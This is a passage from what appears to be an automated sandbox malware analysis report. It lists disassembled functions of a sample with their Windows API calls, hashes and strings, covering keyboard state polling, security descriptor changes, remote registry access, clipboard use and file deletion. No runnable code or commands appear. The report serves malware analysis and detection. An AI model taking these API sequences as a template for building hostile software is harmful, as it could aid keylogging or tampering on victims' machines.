                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                              • String ID: *.*
                                              • API String ID: 1824444939-438819550
                                              • Opcode ID: fb50102ed63f67980684f06a3e2a18d080ebf511ccc7beabeff2e0052c46d35b
                                              • Instruction ID: 13a97df6b35d0823ca46f21199c4ada0b3f37d3a1da10626d1225ba958db950d
                                              • Opcode Fuzzy Hash: fb50102ed63f67980684f06a3e2a18d080ebf511ccc7beabeff2e0052c46d35b
                                              • Instruction Fuzzy Hash: 3131E23650121B6BCB10AFA4EC59AFEB7ECDF45320F1041F2F854A30A0EB70DA45CA54
                                              Function 00BBA1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00BBA20F
                                              • __swprintf.LIBCMT ref: 00BBA231
                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 00BBA26E
                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00BBA293
                                              • _memset.LIBCMT ref: 00BBA2B2
                                              • _wcsncpy.LIBCMT ref: 00BBA2EE
                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00BBA323
                                              • CloseHandle.KERNEL32(00000000), ref: 00BBA32E
                                              • RemoveDirectoryW.KERNEL32(?), ref: 00BBA337
                                              • CloseHandle.KERNEL32(00000000), ref: 00BBA341
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                              • String ID: :$\$\??\%s
                                              • API String ID: 2733774712-3457252023
                                              • Opcode ID: f4be87ddd25d3d9323d3575d2d4d1da8c6616728d92faf479e65612e5d117361
                                              • Instruction ID: 5881a857165c9c2d676ab1b8df6849869d6cc461bd6ac88012b660934d0f8c50
                                              • Opcode Fuzzy Hash: f4be87ddd25d3d9323d3575d2d4d1da8c6616728d92faf479e65612e5d117361
                                              • Instruction Fuzzy Hash: 8D318DB190410AABDB219FA4DC49FFB77FCEF89740F1041B6F509D2160EBB096448B29
                                              Function 00BDC1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windownativeCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B52612: GetWindowLongW.USER32(?,000000EB), ref: 00B52623
                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00BDC1FC
                                              • GetFocus.USER32 ref: 00BDC20C
                                              • GetDlgCtrlID.USER32(00000000), ref: 00BDC217
                                              • _memset.LIBCMT ref: 00BDC342
                                              • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00BDC36D
                                              • GetMenuItemCount.USER32(?), ref: 00BDC38D
                                              • GetMenuItemID.USER32(?,00000000), ref: 00BDC3A0
                                              • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00BDC3D4
                                              • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00BDC41C
                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00BDC454
                                              • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 00BDC489
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                                              • String ID: 0
                                              • API String ID: 3616455698-4108050209
                                              • Opcode ID: c35759f9f107af774dccee746c5b58c1471b76e718939d153b21b0b032e38dc3
                                              • Instruction ID: 31e855e6206381a086eb85d674d5f8127d07a258baedea12ad1a081a48ec62b8
                                              • Opcode Fuzzy Hash: c35759f9f107af774dccee746c5b58c1471b76e718939d153b21b0b032e38dc3
                                              • Instruction Fuzzy Hash: D6817B706093029FDB14CF14D894ABABBE8FF89714F0049AEF99597391EB30D905CB92
                                              Function 00BA7CAF Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00BA8202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00BA821E
                                                • Part of subcall function 00BA8202: GetLastError.KERNEL32(?,00BA7CE2,?,?,?), ref: 00BA8228
                                                • Part of subcall function 00BA8202: GetProcessHeap.KERNEL32(00000008,?,?,00BA7CE2,?,?,?), ref: 00BA8237
                                                • Part of subcall function 00BA8202: RtlAllocateHeap.NTDLL(00000000,?,00BA7CE2), ref: 00BA823E
                                                • Part of subcall function 00BA8202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00BA8255
                                                • Part of subcall function 00BA829F: GetProcessHeap.KERNEL32(00000008,00BA7CF8,00000000,00000000,?,00BA7CF8,?), ref: 00BA82AB
                                                • Part of subcall function 00BA829F: RtlAllocateHeap.NTDLL(00000000,?,00BA7CF8), ref: 00BA82B2
                                                • Part of subcall function 00BA829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00BA7CF8,?), ref: 00BA82C3
                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00BA7D13
                                              • _memset.LIBCMT ref: 00BA7D28
                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00BA7D47
                                              • GetLengthSid.ADVAPI32(?), ref: 00BA7D58
                                              • GetAce.ADVAPI32(?,00000000,?), ref: 00BA7D95
                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00BA7DB1
                                              • GetLengthSid.ADVAPI32(?), ref: 00BA7DCE
                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00BA7DDD
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 00BA7DE4
                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00BA7E05
                                              • CopySid.ADVAPI32(00000000), ref: 00BA7E0C
                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00BA7E3D
                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00BA7E63
                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00BA7E77
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                              • String ID:
                                              • API String ID: 2347767575-0
                                              • Opcode ID: e5bc2501b20ecbdabca23ff34c68bf1a4f714b067505b7078364ac32b33a5451
                                              • Instruction ID: da5246be21fb1aba21ec7440df51b5ee381ee08e5a8c80437e71a80610424ce0
                                              • Opcode Fuzzy Hash: e5bc2501b20ecbdabca23ff34c68bf1a4f714b067505b7078364ac32b33a5451
                                              • Instruction Fuzzy Hash: 46611E7190820AAFDF109FA5DC95ABEBBB9FF05300F0481AAE915A7251DB319A05CB60
                                              Function 00B666E1 Relevance: 19.6, Strings: 15, Instructions: 889COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$dowp0dowp4dowp2dowp4dowp0dowp5dowpcdowpbdowp2dowpbdowp6dowp5dowpfdowpcdowpfdowpfdowp7dowp5dowpddowp8dowp5dowp9dowpfdowpfdowp7dowp5
                                              • API String ID: 0-3457523301
                                              • Opcode ID: 6b08768993bf93741164d4a00ee670c2b7c02c53be94055fb3cc9d9378044832
                                              • Instruction ID: 84a8ee8aa1c8e43305f77563b0fe57bb20a7b475170dc2fca9f2c872b165a24e
                                              • Opcode Fuzzy Hash: 6b08768993bf93741164d4a00ee670c2b7c02c53be94055fb3cc9d9378044832
                                              • Instruction Fuzzy Hash: 58726D71E04219DBDF64CF59C8807AEB7F5FF49310F1485AAE849EB291EB349981CB90
                                              Function 00BB001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetKeyboardState.USER32(?), ref: 00BB0097
                                              • SetKeyboardState.USER32(?), ref: 00BB0102
                                              • GetAsyncKeyState.USER32(000000A0), ref: 00BB0122
                                              • GetKeyState.USER32(000000A0), ref: 00BB0139
                                              • GetAsyncKeyState.USER32(000000A1), ref: 00BB0168
                                              • GetKeyState.USER32(000000A1), ref: 00BB0179
                                              • GetAsyncKeyState.USER32(00000011), ref: 00BB01A5
                                              • GetKeyState.USER32(00000011), ref: 00BB01B3
                                              • GetAsyncKeyState.USER32(00000012), ref: 00BB01DC
                                              • GetKeyState.USER32(00000012), ref: 00BB01EA
                                              • GetAsyncKeyState.USER32(0000005B), ref: 00BB0213
                                              • GetKeyState.USER32(0000005B), ref: 00BB0221
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: State$Async$Keyboard
                                              • String ID:
                                              • API String ID: 541375521-0
                                              • Opcode ID: d7ed342c22d929227f56d9a5549e6bdea7fad7563b90d89e4cce48d2a852922d
                                              • Instruction ID: 9ac8b69e79fa9050fca53a48fb46d632d329b64a082fa2d3a9063ef13bd1ae64
                                              • Opcode Fuzzy Hash: d7ed342c22d929227f56d9a5549e6bdea7fad7563b90d89e4cce48d2a852922d
                                              • Instruction Fuzzy Hash: 4651B4209157882BFB35FBA488547FBBFF4DF11380F4845DA99C2561C2EAE49A8CC761
                                              Function 00BD03DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00BD0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BCFDAD,?,?), ref: 00BD0E31
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BD04AC
                                                • Part of subcall function 00B59837: __itow.LIBCMT ref: 00B59862
                                                • Part of subcall function 00B59837: __swprintf.LIBCMT ref: 00B598AC
                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00BD054B
                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00BD05E3
                                              • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00BD0822
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00BD082F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                              • String ID:
                                              • API String ID: 1240663315-0
                                              • Opcode ID: fb1dcebe41d3f290cc017971277db67be779a551c929586f21024e552e093667
                                              • Instruction ID: 13fd8f1d7e294898f81d35aee0c39ad15f295d17b151571c49da70359717f208
                                              • Opcode Fuzzy Hash: fb1dcebe41d3f290cc017971277db67be779a551c929586f21024e552e093667
                                              • Instruction Fuzzy Hash: F4E14F71604205AFCB14EF24C895E6ABBE4FF89714F0485ADF84ADB361DA31ED05CB52
                                              Function 00BC83BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B59837: __itow.LIBCMT ref: 00B59862
                                                • Part of subcall function 00B59837: __swprintf.LIBCMT ref: 00B598AC
                                              • CoInitialize.OLE32 ref: 00BC8403
                                              • CoUninitialize.COMBASE ref: 00BC840E
                                              • CoCreateInstance.COMBASE(?,00000000,00000017,00BE2BEC,?), ref: 00BC846E
                                              • IIDFromString.COMBASE(?,?), ref: 00BC84E1
                                              • VariantInit.OLEAUT32(?), ref: 00BC857B
                                              • VariantClear.OLEAUT32(?), ref: 00BC85DC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                              • API String ID: 834269672-1287834457
                                              • Opcode ID: 7e183c18f8552ef990f7241c9bf28a4df1d6359a9af1346aa7382ef4865233e5
                                              • Instruction ID: 0a915e8be267b752a2eacfb08a3b77c3d863ad8e05e4b83acbf5ab526cb30b90
                                              • Opcode Fuzzy Hash: 7e183c18f8552ef990f7241c9bf28a4df1d6359a9af1346aa7382ef4865233e5
                                              • Instruction Fuzzy Hash: 53618970608312AFC714DF64C889F6AB7E8AF49754F04489DF9869B291DB70ED48CB92
                                              Function 00BC4164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                              • String ID:
                                              • API String ID: 1737998785-0
                                              • Opcode ID: 4bcacbc6ed719bf86f51660984f9b9fb871160939af4243db2300cbdca7287ac
                                              • Instruction ID: dad28a48c56a6702af1b9da038ba772170d9931429192221b6f6606a6cf39fc1
                                              • Opcode Fuzzy Hash: 4bcacbc6ed719bf86f51660984f9b9fb871160939af4243db2300cbdca7287ac
                                              • Instruction Fuzzy Hash: 89218D352052119FDB10AF24DC69F6EBBE8EF55751F1480AAF9469B2A1EB30ED00CB54
                                              Function 00BB37EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B54750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B54743,?,?,00B537AE,?), ref: 00B54770
                                                • Part of subcall function 00BB4A31: GetFileAttributesW.KERNEL32(?,00BB370B), ref: 00BB4A32
                                              • FindFirstFileW.KERNEL32(?,?), ref: 00BB38A3
                                              • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00BB394B
                                              • MoveFileW.KERNEL32(?,?), ref: 00BB395E
                                              • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00BB397B
                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00BB399D
                                              • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00BB39B9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                              • String ID: \*.*
                                              • API String ID: 4002782344-1173974218
                                              • Opcode ID: 0d7995ebc6b6d3d84bae7a006fdfefa94848e13cfa22e6fdbbe727ddc07f188f
                                              • Instruction ID: 03b29317e2158dfe91649dd163af7becab5e3952c603261418037b120a5a9c02
                                              • Opcode Fuzzy Hash: 0d7995ebc6b6d3d84bae7a006fdfefa94848e13cfa22e6fdbbe727ddc07f188f
                                              • Instruction Fuzzy Hash: 43516D3190514DABCB11EBA0D992AFDB7F9AF15301F6000E9E846771A1EFA16F0DCB61
                                              Function 00BBF3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                              • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00BBF440
                                              • Sleep.KERNEL32(0000000A), ref: 00BBF470
                                              • _wcscmp.LIBCMT ref: 00BBF484
                                              • _wcscmp.LIBCMT ref: 00BBF49F
                                              • FindNextFileW.KERNEL32(?,?), ref: 00BBF53D
                                              • FindClose.KERNEL32(00000000), ref: 00BBF553
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                              • String ID: *.*
                                              • API String ID: 713712311-438819550
                                              • Opcode ID: 26deae6f3979ea7bfd3486e06ab12012c0fdcd9ca8a68eaeea0c2f99851e02f2
                                              • Instruction ID: 39e7682a34cf8e2dd4a0fbd717266b625db8158353a298b8e5de050756c024ff
                                              • Opcode Fuzzy Hash: 26deae6f3979ea7bfd3486e06ab12012c0fdcd9ca8a68eaeea0c2f99851e02f2
                                              • Instruction Fuzzy Hash: 45417C7190421AAFCF24EF64DC55AFEBBF4FF15310F1444A6E815A32A0EB709A58CB50
                                              Function 00BDD43E Relevance: 12.3, APIs: 8, Instructions: 257windownativeCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B52612: GetWindowLongW.USER32(?,000000EB), ref: 00B52623
                                              • GetSystemMetrics.USER32(0000000F), ref: 00BDD47C
                                              • GetSystemMetrics.USER32(0000000F), ref: 00BDD49C
                                              • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00BDD6D7
                                              • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00BDD6F5
                                              • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00BDD716
                                              • ShowWindow.USER32(00000003,00000000), ref: 00BDD735
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00BDD75A
                                              • NtdllDialogWndProc_W.NTDLL(?,00000005,?,?), ref: 00BDD77D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Window$MessageMetricsSendSystem$DialogInvalidateLongMoveNtdllProc_RectShow
                                              • String ID:
                                              • API String ID: 830902736-0
